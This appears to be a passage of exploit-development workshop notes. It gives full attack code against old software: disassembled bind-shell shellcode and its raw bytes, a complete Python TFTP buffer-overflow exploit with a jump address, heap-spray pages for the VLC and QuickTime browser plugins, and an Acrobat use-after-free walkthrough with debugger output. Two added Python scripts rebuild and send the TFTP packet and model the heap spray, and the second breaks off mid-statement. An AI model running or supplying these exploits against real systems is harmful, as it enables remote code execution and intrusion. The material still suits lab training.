- 0000000A 8B6C2424 mov ebp,[esp+0x24]
- 0000000E 8B453C mov eax,[ebp+0x3c]
- 00000011 8B7C0578 mov edi,[ebp+eax+0x78]
- 00000015 01EF add edi,ebp
- 00000017 8B4F18 mov ecx,[edi+0x18]
- 0000001A 8B5F20 mov ebx,[edi+0x20]
- 0000001D 01EB add ebx,ebp
- 0000001F 49 dec ecx
- 00000020 8B348B mov esi,[ebx+ecx*4]
- 00000023 01EE add esi,ebp
- 00000025 31C0 xor eax,eax
- 00000027 99 cdq
- 00000028 AC lodsb
- 00000029 84C0 test al,al
- 0000002B 7407 jz 0x34
- 0000002D C1CA0D ror edx,0xd
- 00000030 01C2 add edx,eax
- 00000032 EBF4 jmp short 0x28
- 00000034 3B542428 cmp edx,[esp+0x28]
- 00000038 75E5 jnz 0x1f
- 0000003A 8B5F24 mov ebx,[edi+0x24]
- 0000003D 01EB add ebx,ebp
- 0000003F 668B0C4B mov cx,[ebx+ecx*2]
- 00000043 8B5F1C mov ebx,[edi+0x1c]
- 00000046 01EB add ebx,ebp
- 00000048 032C8B add ebp,[ebx+ecx*4]
- 0000004B 896C241C mov [esp+0x1c],ebp
- 0000004F 61 popad
- 00000050 C3 ret
- 00000051 31DB xor ebx,ebx
- 00000053 648B4330 mov eax,[fs:ebx+0x30]
- 00000057 8B400C mov eax,[eax+0xc]
- 0000005A 8B701C mov esi,[eax+0x1c]
- 0000005D AD lodsd
- 0000005E 8B4008 mov eax,[eax+0x8]
- 00000061 5E pop esi
- 00000062 688E4E0EEC push dword 0xec0e4e8e
- 00000067 50 push eax
- 00000068 FFD6 call esi
- 0000006A 6653 push bx
- 0000006C 66683332 push word 0x3233
- 00000070 687773325F push dword 0x5f327377
- 00000075 54 push esp
- 00000076 FFD0 call eax
- 00000078 68CBEDFC3B push dword 0x3bfcedcb
- 0000007D 50 push eax
- 0000007E FFD6 call esi PART 1
- 00000080 5F pop edi
- 00000081 89E5 mov ebp,esp
- 00000083 6681ED0802 sub bp,0x208
- 00000088 55 push ebp
- 00000089 6A02 push byte +0x2
- 0000008B FFD0 call eax
- 0000008D 68D909F5AD push dword 0xadf509d9
- 00000092 57 push edi
- 00000093 FFD6 call esi
- 00000095 53 push ebx
- 00000096 53 push ebx
- --------------------------------------------CUTCUTCUTCUTCUT----8<---8<---8<---
- 00000097 53 push ebx
- 00000098 53 push ebx
- 00000099 53 push ebx
- 0000009A 43 inc ebx
- 0000009B 53 push ebx
- 0000009C 43 inc ebx
- 0000009D 53 push ebx PART 2
- 0000009E FFD0 call eax
- 000000A0 6668115C push word 0x5c11
- 000000A4 6653 push bx
- 000000A6 89E1 mov ecx,esp
- 000000A8 95 xchg eax,ebp
- 000000A9 68A41A70C7 push dword 0xc7701aa4
- 000000AE 57 push edi
- 000000AF FFD6 call esi
- 000000B1 6A10 push byte +0x10
- 000000B3 51 push ecx
- 000000B4 55 push ebp
- 000000B5 FFD0 call eax
- 000000B7 68A4AD2EE9 push dword 0xe92eada4
- 000000BC 57 push edi
- 000000BD FFD6 call esi
- 000000BF 53 push ebx
- 000000C0 55 push ebp
- 000000C1 FFD0 call eax
- 000000C3 68E5498649 push dword 0x498649e5
- 000000C8 57 push edi
- 000000C9 FFD6 call esi
- 000000CB 50 push eax
- 000000CC 54 push esp
- 000000CD 54 push esp
- 000000CE 55 push ebp
- 000000CF FFD0 call eax
- 000000D1 93 xchg eax,ebx
- 000000D2 68E779C679 push dword 0x79c679e7
- 000000D7 57 push edi
- 000000D8 FFD6 call esi
- 000000DA 55 push ebp
- 000000DB FFD0 call eax
- 000000DD 666A64 push word 0x64
- 000000E0 6668636D push word 0x6d63
- 000000E4 89E5 mov ebp,esp
- 000000E6 6A50 push byte +0x50
- 000000E8 59 pop ecx
- 000000E9 29CC sub esp,ecx
- 000000EB 89E7 mov edi,esp
- 000000ED 6A44 push byte +0x44
- 000000EF 89E2 mov edx,esp
- 000000F1 31C0 xor eax,eax
- 000000F3 F3AA rep stosb
- 000000F5 FE422D inc byte [edx+0x2d]
- 000000F8 FE422C inc byte [edx+0x2c]
- 000000FB 93 xchg eax,ebx
- 000000FC 8D7A38 lea edi,[edx+0x38]
- 000000FF AB stosd
- 00000100 AB stosd
- 00000101 AB stosd
- 00000102 6872FEB316 push dword 0x16b3fe72
- 00000107 FF7544 push dword [ebp+0x44]
- 0000010A FFD6 call esi
- 0000010C 5B pop ebx
- 0000010D 57 push edi
- 0000010E 52 push edx
- 0000010F 51 push ecx
- 00000110 51 push ecx
- 00000111 51 push ecx
- 00000112 6A01 push byte +0x1
- 00000114 51 push ecx
- 00000115 51 push ecx
- 00000116 55 push ebp
- 00000117 51 push ecx
- 00000118 FFD0 call eax
- 0000011A 68ADD905CE push dword 0xce05d9ad
- 0000011F 53 push ebx
- 00000120 FFD6 call esi
- 00000122 6AFF push byte -0x1
- 00000124 FF37 push dword [edi]
- 00000126 FFD0 call eax
- 00000128 8B57FC mov edx,[edi-0x4]
- 0000012B 83C464 add esp,byte +0x64
- 0000012E FFD6 call esi
- 00000130 52 push edx
- 00000131 FFD0 call eax
- 00000133 68F08A045F push dword 0x5f048af0
- 00000138 53 push ebx
- 00000139 FFD6 call esi
- 0000013B FFD0 call eax
- part1 = "\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b\x45"
- part1 += "\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49"
- part1 += "\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d"
- part1 += "\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f\x24\x01\xeb\x66"
- part1 += "\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61"
- part1 += "\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40"
- part1 += "\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\x66\x68\x33\x32"
- part1 += "\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\x3b\x50\xff\xd6"
- part1 += "\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09"
- part1 += "\xf5\xad\x57\xff\xd6\x53\x53"
- part2 = "\x53\x53\x53\x43\x53\x43\x53\xff\xd0"
- part2 += "\x66\x68\x11\x5c\x66\x53\x89\xe1\x95\x68\xa4\x1a\x70\xc7\x57\xff"
- part2 += "\xd6\x6a\x10\x51\x55\xff\xd0\x68\xa4\xad\x2e\xe9\x57\xff\xd6\x53"
- part2 += "\x55\xff\xd0\x68\xe5\x49\x86\x49\x57\xff\xd6\x50\x54\x54\x55\xff"
- part2 += "\xd0\x93\x68\xe7\x79\xc6\x79\x57\xff\xd6\x55\xff\xd0\x66\x6a\x64"
- part2 += "\x66\x68\x63\x6d\x89\xe5\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89"
- part2 += "\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93\x8d\x7a\x38\xab"
- part2 += "\xab\xab\x68\x72\xfe\xb3\x16\xff\x75\x44\xff\xd6\x5b\x57\x52\x51"
- part2 += "\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05\xce\x53"
- part2 += "\xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x57\xfc\x83\xc4\x64\xff\xd6"
- part2 += "\x52\xff\xd0\x68\xf0\x8a\x04\x5f\x53\xff\xd6\xff\xd0"
- STACK SHIFTER:
- prepend = "\x81\xC4\xFF\xEF\xFF\xFF" # add esp, -1001h
- prepend += "\x44" # inc esp
- ---- final script ----
- #!/usr/bin/python2
- #TFTP Server remote Buffer Overflow
- import sys
- import socket
- import struct
- if len(sys.argv) < 2:
-     sys.stderr.write("Usage: tftpd.py <host>\n")
-     sys.exit(1)
- target = sys.argv[1]
- port = 69
- eip = 0x7e429353 # jmp esp in USER32.DLL
- # shellcode part 1: bytes 0x00-0x96 of the bind shell (ends after the "push ebx" at 0x96)
- part1 = "\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b\x45"
- part1 += "\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49"
- part1 += "\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d"
- part1 += "\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f\x24\x01\xeb\x66"
- part1 += "\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61"
- part1 += "\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40"
- part1 += "\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\x66\x68\x33\x32"
- part1 += "\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\x3b\x50\xff\xd6"
- part1 += "\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09"
- part1 += "\xf5\xad\x57\xff\xd6\x53\x53"
- # shellcode part 2: bytes 0x97-0x13c, continues exactly where part 1 stopped
- part2 = "\x53\x53\x53\x43\x53\x43\x53\xff\xd0"
- part2 += "\x66\x68\x11\x5c\x66\x53\x89\xe1\x95\x68\xa4\x1a\x70\xc7\x57\xff"
- part2 += "\xd6\x6a\x10\x51\x55\xff\xd0\x68\xa4\xad\x2e\xe9\x57\xff\xd6\x53"
- part2 += "\x55\xff\xd0\x68\xe5\x49\x86\x49\x57\xff\xd6\x50\x54\x54\x55\xff"
- part2 += "\xd0\x93\x68\xe7\x79\xc6\x79\x57\xff\xd6\x55\xff\xd0\x66\x6a\x64"
- part2 += "\x66\x68\x63\x6d\x89\xe5\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89"
- part2 += "\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93\x8d\x7a\x38\xab"
- part2 += "\xab\xab\x68\x72\xfe\xb3\x16\xff\x75\x44\xff\xd6\x5b\x57\x52\x51"
- part2 += "\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05\xce\x53"
- part2 += "\xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x57\xfc\x83\xc4\x64\xff\xd6"
- part2 += "\x52\xff\xd0\x68\xf0\x8a\x04\x5f\x53\xff\xd6\xff\xd0"
- # stack shifter: add esp,-0x1000 without a NUL byte (81 C4 00 F0 FF FF would end the filename string)
- prepend = "\x81\xC4\xFF\xEF\xFF\xFF" # add esp, -1001h
- prepend += "\x44" # inc esp
- buf = "\x00\x01" # TFTP opcode 1: read request (the filename that follows overflows)
- buf += "\x90" * (256 - len(part2)) # NOPs (90 of them) fill the space before part 2
- buf += part2 # shellcode part 2, ending right at the saved return address
- buf += struct.pack('<I', eip) # EIP (JMP ESP): after the ret, ESP points at the next byte
- buf += prepend # stack shifter, so the shellcode's pushes don't overwrite part 2
- buf += part1 # shellcode part 1 runs first
- buf += "\xE9" + struct.pack('<i', -380) # JMP -380: back into the NOP sled, which slides into part 2
- buf += "\x00" # END of the filename (TFTP fields are NUL-terminated strings)
- # print buf
- # buf = "\x00\x01" # receive command
- # buf += "A" * 300 + "\x00"
- sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
- try:
-     sock.connect((target, port))
-     sock.sendall(buf)
-     sys.stderr.write("Sent.\n")
- except Exception as e:
-     sys.stderr.write("Cannot send to "+str(target)+" : "+str(port)+" : "+str(e)+"!\n")
- finally:
-     sock.close()
- -----------------------------------------------------------------------------------------------------------------
- How does all of this actually work
- Total shellcode length: 317 bytes (Size=317 in the generator comment: 19 full lines of 16 bytes plus 13)
- Part1: 151 bytes, offsets 0x00-0x96 of the disassembly, ending after the "push ebx" at 0x96
- Part2: 166 bytes, offsets 0x97-0x13C, starting with the very next instruction
- NOPS * (256 - 166) = 90 NOPs
- 90 NOPs + part2 (166) + JMP ESP (4) + stack shift (7 bytes: add esp,-0x1001 ; inc esp) + part1 (151) + JMP -380 (5)
- offset: 0          90           256          260                                     267          418    423
- After JMP ESP, ESP points at offset 260, so execution runs the stack shifter, then part1, then reaches the JMP at offset 418. A JMP rel32 is relative to the end of the instruction (offset 423), so -380 lands at offset 43: inside the 90-byte NOP sled, which slides into part2 at offset 90.
- The stack shifter runs first because the shellcode is executing on the stack: its pushes and calls write below ESP, i.e. over EIP and part2. Moving ESP down by 0x1000 first keeps those writes away from the code. (-0x1001 followed by inc esp is used because add esp,-0x1000 encodes with a 0x00 byte, which would end the filename string.)
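The script hard-codes -380 and the shifter bytes, so changing the shellcode or the space before EIP silently breaks the jump. As an added example (not the tftpd skeleton), the builder below derives the jump from the actual lengths, aims for the middle of the sled, encodes the null-free stack shifter for any delta, and checks that the packet carries no NUL before the terminator. The two halves are stand-ins of the real lengths (151 and 166 bytes of INT3); the real bytes are in dumpshellcode.py above. The JMP ESP address is the page's 0x7e429353.

```python
#!/usr/bin/env python3
"""Lab 2c packet layout with the back jump computed instead of hard-coded (added example)."""
import struct

# Stand-ins with the real halves' lengths (151 and 166 bytes); the real bytes are on the page.
PART1 = b"\xcc" * 151
PART2 = b"\xcc" * 166
JMP_ESP = 0x7e429353          # jmp esp in user32.dll on the XP SP3 target


def stack_shifter(delta):
    """add esp, <delta> with no NUL byte.  -0x1000 encodes as 81 C4 00 F0 FF FF, so the
    page uses -0x1001 (81 C4 FF EF FF FF) followed by inc esp (44); this generalises that."""
    enc = struct.pack("<i", delta)
    if b"\x00" not in enc:
        return b"\x81\xc4" + enc
    enc = struct.pack("<i", delta - 1)
    if b"\x00" in enc:
        raise ValueError("cannot encode delta without a NUL")
    return b"\x81\xc4" + enc + b"\x44"


def build(part1=PART1, part2=PART2, jmp_esp=JMP_ESP, space_before_eip=256, shift=-0x1000):
    """Returns (packet, body): body is [NOPs][part2][EIP][shifter][part1][jmp back]."""
    if len(part2) > space_before_eip:
        raise ValueError("part 2 does not fit before EIP")
    sled = b"\x90" * (space_before_eip - len(part2))
    body = sled + part2 + struct.pack("<I", jmp_esp) + stack_shifter(shift) + part1
    jmp_end = len(body) + 5                    # rel32 is relative to the end of the E9
    target = len(sled) // 2                    # middle of the sled: tolerant to small miscounts
    body += b"\xe9" + struct.pack("<i", target - jmp_end)
    if b"\x00" in body:
        raise ValueError("NUL inside the filename would truncate the copy")
    return b"\x00\x01" + body + b"\x00", body  # opcode 1 (RRQ), filename, terminator


def landing(body):
    """Offset into body where the trailing E9 lands (must be inside the sled)."""
    rel = struct.unpack("<i", body[-4:])[0]
    return len(body) + rel


def page_jump_target(rel=-380):
    """Where the page's hard-coded JMP -380 lands with the real part sizes."""
    body_len = 256 + 4 + len(stack_shifter(-0x1000)) + len(PART1) + 5
    return body_len + rel


if __name__ == "__main__":
    import socket, sys
    packet, body = build()
    print("jump lands at sled offset %d of %d" % (landing(body), 256 - len(PART2)), file=sys.stderr)
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    s.sendto(packet, (sys.argv[1], 69))        # python3 tftp_split.py target-ip
```

With the page's sizes the hard-coded -380 lands 43 bytes into the 90-byte sled, so it works; the computed version lands at 45 and keeps working if, say, an encoder changes the length of either half.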
- ############################
- # Lab 3: Browsers Exploits #
- ############################
- ---------------------------Type This-----------------------------------
- cd C:\Documents and Settings\strategic security\Desktop\ED-Workshop-Files\Lab3\ffvlc_skeleton
- -----------------------------------------------------------------------
- Quicktime - overflow, if we send a very long rtsp:// URL, Quicktime crashes
- rtsp://AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA......50000
- <object id=quicktime clsid="999-999999-99-99999">
- <param name="URL" value="rtsp://AAAAAAAAAAAAAAAAAAAAAAAAA....">
- </object>
- var buf = "";
- for(i = 0; i < 50000; i++)
- buf += "A";
- var myobject = document.getElementById("quicktime");
- myobject.url = buf;
- You can pre-load the process memory more or less the way you like before triggering the bug (that is what heap spraying is). The same idea applies to other client-side targets:
- - Browsers (Flash)
- - PDF
- - MS Office / OOo
- VLC smb:// exploit
- ------------------
- EXPLOIT VECTOR
- smb://example.com@0.0.0.0/foo/#{AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA}
- Exploit Scripts
- - ffvlc
- ON YOUR HOST, RUN THE WEBSERVER ON PORT 8080
- perl daemon.pl vlc0.html
- ON YOUR Strategicsec-XP-ED-Target-VM VM, START FIREFOX
- Browse to http://your_host_ip_address:8080/
- vlc0.html
- ---------
- <script>
- var buf = "";
- for(i = 0; i < 1250; i++)
- buf += unescape("%41%41%41%41");
- var track = "smb://example.com\@0.0.0.0/foo/#{" + buf + "}";
- document.write("<embed type='application/x-vlc-plugin' target='" + track + "' />");
- </script>
- vlc1.html
- ---------
- <script>
- // shellcode created in heap memory: 16 bytes of INT3 for now (each %uXXXX is one little-endian 16-bit unit)
- var shellcode = unescape("%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc");
- // NOP block: start with 4 NOPs and double until the string is at least 0xc0000 UTF-16 units
- // (the doubling ends at 0x100000 units, i.e. 2 MB of 0x90)
- var nop = unescape("%u9090%u9090"); // 4 NOPS
- while(nop.length < 0xc0000) {
-     nop += nop;
- }
- // spray the heap with 50 copies of NOP+shellcode
- var memory = new Array();
- for(i = 0; i < 50; i++) {
-     memory[i] = nop + shellcode;
- }
- // build the exploit payload (same 5000 bytes of A as vlc0.html)
- var buf = "";
- for(i = 0; i < 1250; i++)
-     buf += unescape("%41%41%41%41");
- var track = "smb://example.com\@0.0.0.0/foo/#{" + buf + "}";
- // trigger the exploit
- document.write("<embed type='application/x-vlc-plugin' target='" + track + "' />");
- </script>
- ---------------------------Type This-----------------------------------
- perl daemon.pl vlc1.html
- -----------------------------------------------------------------------
- Search for where our NOPS+shellcode lies in the heap
- s 0 l fffffff 90 90 90 90 cc cc cc cc
- 0:019> s 0 l fffffff 90 90 90 90 cc cc cc cc
- 03dffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
- 040ffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
- 043ffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
- 046ffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
- 049ffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
- 04cffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
- 04fffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
- 052ffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
- 055ffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
- 058ffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
- 05bffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
- 05effffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
- 061ffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
- 064ffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
- 067ffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
- 06affffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
- Edit vlc2.html
- replace %41%41%41%41 with %07%07%07%07
- (928.fd0): Break instruction exception - code 80000003 (first chance)
- eax=fffffd66 ebx=07070707 ecx=77c2c2e3 edx=00340000 esi=07070707 edi=07070707
- eip=07100000 esp=0e7afc58 ebp=07070707 iopl=0 nv up ei pl nz ac pe nc
- cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000216
- 07100000 cc int 3
- 0:019> u
- 07100000 cc int 3
- 07100001 cc int 3
- 07100002 cc int 3
- 07100003 cc int 3
- 07100004 cc int 3
- 07100005 cc int 3
- 07100006 cc int 3
- 07100007 cc int 3
- Create vlc3.html (Copy vlc2.html to vlc3.html)
- ----------------------------------------------
- Win32 Reverse Shell
- - no restricted characters
- - Encoder NONE
- - use the Javascript encoded payload generated by msfweb
- #######################
- # Lab 4: PDF EXPLOITS #
- #######################
- ---------------------------Type This-----------------------------------
- cd C:\Documents and Settings\strategic security\Desktop\ED-Workshop-Files\Lab4\adobe_mnp_skeleton
- -----------------------------------------------------------------------
- Acrobat Media newPlayer exploit
- -------------------------------
- Use-after-free bug
- Exploit scripts are online at 172.16.0.100
- - adobe_mnp
- Download these scripts on your Strategicsec-XP-ED-Target-VM VM itself.
- mnp0.pdf
- - Open up acrobat reader
- - WinDBG
- - F6 attach to AcroRd32.exe
- - g to Go
- EIP = 41414141
- Next step is to spray the heap with NOPS+shellcode, and then land EIP in the heap.
- mnp1.pdf
- All we are doing is changing EIP to 0c0c0c0c.
- There is no heap spray in this one.
- This exception may be expected and handled.
- eax=02e2d638 ebx=23826917 ecx=02e2d638 edx=02e2f868 esi=02c07674 edi=02c07674
- eip=0c0c0c0c esp=0013fb38 ebp=0013fbb8 iopl=0 nv up ei pl nz na po nc
- cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202
- 0c0c0c0c ?? ???
- We know we get EIP control
- mnp2.pdf
- Put in the heap spray.
- var shellcode = unescape("%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc");
- var nops = unescape("%u9090%u9090");
- while(nops.length <= 32768)
- nops += nops;
- nops = nops.substring(0,32768 - shellcode.length);
- memory = new Array();
- for(i = 0; i < 1500; i++) {
- memory[i] = nops + shellcode;
- }
- 1500 blocks, each 32768 JS characters (64 KB, since the JS engine stores each character as 2 bytes): a long run of NOPs with the shellcode at the very end.
- If the spray covers address 0c0c0c0c, EIP = 0c0c0c0c lands in a NOP sled and should slide into the INT3 shellcode.
- We want to see what led to the crash.
- EIP is invalid, so we can't disassemble around EIP
- We need to trace the function that called us and crashed.
- - STACK TRACE
- - Dumps all the frames from the top of the stack.
- - show you the series of calls that led up to the crash.
- - we will analyze the topmost function on the frame.
- WinDBG - stack trace - "k" command
- 0:000> k
- ChildEBP RetAddr
- WARNING: Frame IP not in any known module. Following frames may be wrong.
- 0013fb34 2d843117 0x90909090
- 0013fbb8 23826934 Multimedia!PlugInMain+0x41b69
- 0013fbdc 23825d8c EScript!PlugInMain+0x25584
- 0013fc74 238257e2 EScript!PlugInMain+0x249dc
- 0013fca4 238543c5 EScript!PlugInMain+0x24432
- 0013fd04 00a78de1 EScript!PlugInMain+0x53015
- 0013fd20 7e418734 AcroRd32_940000!DllCanUnloadNow+0x67290
- 0013fd4c 7e418816 USER32!InternalCallWinProc+0x28
- 0013fdb4 7e4189cd USER32!UserCallWinProcCheckWow+0x150
- 0013fe14 7e418a10 USER32!DispatchMessageWorker+0x306
- 0013fe24 00a323b4 USER32!DispatchMessageW+0xf
- 0013fe94 00a31de8 AcroRd32_940000!DllCanUnloadNow+0x20863
- 0013fecc 0094389f AcroRd32_940000!DllCanUnloadNow+0x20297
- 0013fee4 009436ee AcroRd32_940000!AcroWinMain+0x1c8
- 0013ff2c 00404004 AcroRd32_940000!AcroWinMain+0x17
- 0013ffc0 7c817067 AcroRd32+0x4004
- 0013fff0 00000000 kernel32!BaseProcessStart+0x23
- 2d843117 -- the return address we would have returned to if we hadn't crashed.
- The instruction just before a return address is the CALL that pushed it, but x86 instructions are variable length, so back up a few bytes until the disassembly lines up on a CALL:
- u 2d843117
- u 2d843117-2
- u 2d843117-3 <---- we found the CALL instruction - call [edx+4]
- u 2d843117-4
- 0:000> u 2d843117-3
- Multimedia!PlugInMain+0x41b66:
- 2d843114 ff5204 call dword ptr [edx+4] <---- the culprit!!!
- 2d843117 6a00 push 0
- 2d843119 68d8b68c2d push offset Multimedia!PlugInMain+0xca12a (2d8cb6d8)
- 2d84311e 56 push esi
- 2d84311f e842aefdff call Multimedia!PlugInMain+0x1c9b8 (2d81df66)
- 2d843124 83c40c add esp,0Ch
- 2d843127 66b80100 mov ax,1
- 2d84312b 5e pop esi
- We control EDX
- edx=0c0c0c0c
- call [edx+4] = call [0c0c0c10]
- dd edx+4
- 0:000> dd edx+4
- 0c0c0c10 90909090 90909090 90909090 90909090
- 0c0c0c20 90909090 90909090 90909090 90909090
- 0:000> u 2d843117-7
- Multimedia!PlugInMain+0x41b62:
- 2d843110 8b10 mov edx,dword ptr [eax]
- 2d843112 8bc8 mov ecx,eax
- 2d843114 ff5204 call dword ptr [edx+4]
- dd eax
- 0:000> dd eax
- 02e2d680 0c0c0c0c 0c0c0c0c 0c0c0c0c 0c0c0c0c
- 02e2d690 42424242 42424242 42424242 42424242
- 02e2d6a0 42424242 42424242 42424242 42424242
- 02e2d6b0 42424242 42424242 42424242 42424242
- 02e2d6c0 42424242 42424242 00000000 00000000
- mnp3.pdf
- change the NOPs 90909090 to 0c0c0c0c
- mov edx, [eax]
- call [edx+4]
- edx = 0c0c0c0c
- edx+4 = 0c0c0c10
- contents at edx+4 will also be "0c0c0c0c"
- EIP will jump to 0c0c0c0c
- and...
- 0:000> u 0c0c0c0c
- *** WARNING: Unable to verify checksum for C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\Multimedia.api
- *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\Multimedia.api -
- 0c0c0c0c 0c0c or al,0Ch
- 0c0c0c0e 0c0c or al,0Ch
- 0c0c0c10 0c0c or al,0Ch
- 0c0c0c12 0c0c or al,0Ch
- 0c0c0c14 0c0c or al,0Ch
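- Why mnp2.pdf ends up at 0x90909090 while mnp3.pdf stays at 0c0c0c0c follows directly from the two dereferences above (mov edx,[eax] ; call [edx+4]), and can be replayed against a model of the sprayed heap without a debugger. The script below is an added example, not code from the course or the lab files: the spray base address (0x0a000000) and the 16-byte int3 stand-in for shellcode are assumptions for illustration, the block count (1500) comes from mnp2.pdf, and the object address (0x02e2d680) and its 0c0c0c0c contents come from the dd eax output above.

```python
import struct

SHELLCODE = b"\xcc" * 16        # stand-in for the real shellcode (int3s, as in the lab)
BLOCK_CHARS = 32768             # 32K JS characters per block, as in mnp2.pdf
BLOCK_BYTES = BLOCK_CHARS * 2   # the JS engine stores strings as UTF-16: 2 bytes per character


def make_block(sled_byte, shellcode=SHELLCODE, block_bytes=BLOCK_BYTES):
    """One spray block: a sled of sled_byte with the shellcode at the very end."""
    return bytes([sled_byte]) * (block_bytes - len(shellcode)) + shellcode


class SprayedHeap:
    """Model of process memory: a contiguous run of identical spray blocks plus one
    freed object. Reading anywhere else is an access violation."""

    def __init__(self, base, count, block, obj_addr, obj_bytes):
        self.base, self.block = base, block
        self.end = base + count * len(block)
        self.objects = {obj_addr: obj_bytes}

    def in_spray(self, addr):
        return self.base <= addr < self.end

    def read_dword(self, addr):
        if self.in_spray(addr):
            off = (addr - self.base) % len(self.block)
            chunk = self.block[off:off + 4]
            if len(chunk) < 4:                      # straddles two (identical) blocks
                chunk += self.block[:4 - len(chunk)]
            return struct.unpack("<I", chunk)[0]
        for obj_addr, data in self.objects.items():
            if obj_addr <= addr <= obj_addr + len(data) - 4:
                return struct.unpack_from("<I", data, addr - obj_addr)[0]
        raise MemoryError("access violation reading %#010x" % addr)


def resolve_call_target(mem, eax):
    """Replay  mov edx,[eax] ; call [edx+4]  and return (edx, eip)."""
    edx = mem.read_dword(eax)         # first dword of the freed object = fake vtable pointer
    eip = mem.read_dword(edx + 4)     # second vtable slot = what CALL jumps to
    return edx, eip


# Freed object as dd eax showed it: leading dwords overwritten with 0c0c0c0c, then filler
# (constructed sample, assumption: 64 bytes of 'B')
FREED_OBJECT = struct.pack("<4I", 0x0c0c0c0c, 0x0c0c0c0c, 0x0c0c0c0c, 0x0c0c0c0c) + b"B" * 64


def simulate(sled_byte, base=0x0a000000, count=1500, eax=0x02e2d680):
    """Return (edx, eip, eip_lands_in_spray) for a spray built from sled_byte.
    base is an assumed spray start; the real allocator decides where blocks land."""
    mem = SprayedHeap(base, count, make_block(sled_byte), eax, FREED_OBJECT)
    edx, eip = resolve_call_target(mem, eax)
    return edx, eip, mem.in_spray(eip)


if __name__ == "__main__":
    for name, sled in (("mnp2.pdf (0x90 sled)", 0x90), ("mnp3.pdf (0x0c sled)", 0x0c)):
        edx, eip, ok = simulate(sled)
        print("%-22s edx=%08x  call [edx+4] -> eip=%08x  %s"
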